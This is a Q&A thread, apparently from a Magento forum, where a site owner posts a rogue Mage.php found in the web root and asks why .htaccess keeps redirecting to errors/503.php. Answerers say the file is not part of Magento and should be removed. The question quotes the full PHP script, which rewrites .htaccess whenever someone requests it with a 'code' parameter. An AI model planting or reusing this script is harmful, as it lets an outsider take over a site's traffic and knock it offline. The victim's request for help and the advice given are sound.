# Magento replacing .htaccess file in root directory?

Tags: magento-1.9, .htaccess

Magento replacing my custom .htaccess file? every time my home page lands in : **page is not redirecting**.
the url was www.example.com/errors/503.php

**i would like to make clear there was no maintenance.flag file in root**

The **Mage.php** file which we are discussing here is present in **Root directory** and not the **app/Mage.php**

1. I am using Magento 1.9.0.1 CE
2. I found PHP script in Mage.php file, which creates .htaccess file with errors/503.php redirect.
3. even though .htaccess file exist, why the **else part of Mage.php file is getting executed?**
4. The newly created .htaccess file contains **only redirect to errors/503.php**
5. right now i had changed my .htaccess file permission to 555.

Unable to resolve this. Kindly help me.

**Mage.php contains**

```
<?php

if(isset($_GET['code'])) {

$create_name = "/home/buildg8t/public_html/.htaccess";

if (file_exists($create_name)) { 

$htaccess = file_get_contents($create_name);
$rules = "RewriteBase /";

$content_string = "RewriteEngine On\n";

$content_string .= "RewriteBase /\n";

$content_string .= "RewriteCond %{REQUEST_URI} !^errors\503\.php$\n";

$content_string .= "RewriteRule ^(.*)$ http://www.example.com/errors/503.php [R=307,L]\n";

file_put_contents($create_name, $content_string);
}
else{

$create_name = "../.htaccess";
$file_handle = fopen($create_name, 'w') or die("Error: Can't open file");
//enter the contents
$content_string = "RewriteEngine On\n";
fwrite($file_handle, $content_string);
$content_string = "RewriteBase /\n";
fwrite($file_handle, $content_string);
$content_string = "RewriteCond %{REQUEST_URI} !^errors\503\.php$\n";
fwrite($file_handle, $content_string);
// change www.website.com for your website
$content_string = "RewriteRule ^(.*)$ http://www.example.com/errors/503.php [R=307,L]\n";
fwrite($file_handle, $content_string);
//
fclose($file_handle);
}
}
?>
```

Comment: Can you share the script you found in Mage.php ?

Comment: have you tried with magento default htaccess file

Comment: yes i have tried default , but my .htaccess file gets replaced with a file which has redirect only to errors/503.php

Answer (score 1):

Code you shared is not from standard Mage.php file. Replace this with one from a default installation and you should be good to go. Although, unless someone placed it intentionally, you should investigate why it managed it's way into your installation.

Comment: Thank you for your inputs. The Mage.php file which we are talking here is in root folder and not the app/mage.php . I had checked with the magento stock files and there is no Mage.php file exist in root directory.

Comment: @user1372453, In that case, you need to check which Mage.php file is being called from your index.php file in root.

Comment: no its calling only app/Mage.php

Comment: Try removing that extra Mage.php file from your server, some external process can hit that, replacing your current .htaccess file.